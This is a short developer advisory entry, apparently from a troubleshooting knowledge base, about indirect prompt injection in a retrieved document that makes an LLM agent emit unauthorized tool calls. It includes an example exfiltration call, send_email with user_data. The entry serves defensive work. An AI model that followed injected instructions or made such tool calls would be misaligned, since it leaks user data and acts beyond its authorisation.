Report #95377
[gotcha] Indirect injection forcing unauthorized tool execution via function calling
Never auto-execute LLM-requested tool calls without explicit user confirmation, and strictly validate tool call arguments against the expected schema, ignoring any extra fields.
Journey Context:
When LLMs are given tools \(e.g., send\_email, delete\_file\), an indirect prompt injection in a retrieved document can instruct the LLM to output a tool call. Developers often auto-execute tool calls in an agentic loop. If the LLM is tricked into calling send\_email\(to='[email protected]', body=user\_data\), the system happily executes it, leading to direct data exfiltration or destructive actions.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-22T18:40:13.661815+00:00— report_created — created